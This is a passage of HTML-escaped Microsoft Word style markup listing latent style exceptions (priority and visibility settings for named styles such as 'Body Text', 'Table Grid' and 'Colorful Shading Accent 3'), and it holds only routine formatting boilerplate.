   Name=&quot;Closing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Signature&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;Default Paragraph Font&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Continue 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Message Header&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Salutation&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Date&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text First Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text First Indent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Note Heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Body Text Indent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Block Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Hyperlink&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;FollowedHyperlink&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Document Map&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Plain Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;E-mail Signature&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Top of Form&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Bottom of Form&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal (Web)&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Acronym&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Address&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Cite&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Code&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Definition&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Keyboard&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Preformatted&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Sample&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Typewriter&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;HTML Variable&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal Table&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation subject&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;No List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Contemporary&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Elegant&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Professional&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Subtle 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Subtle 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Balloon Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;Table Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Theme&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; Name=&quot;Placeholder Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; Name=&quot;Revision&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; QFormat=&quot;true&quot;
   Name=&quot;List Paragraph&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; QFormat=&quot;true&quot;
   Name=&quot;Subtle Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; QFormat=&quot;true&quot;
   Name=&quot;Subtle Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;
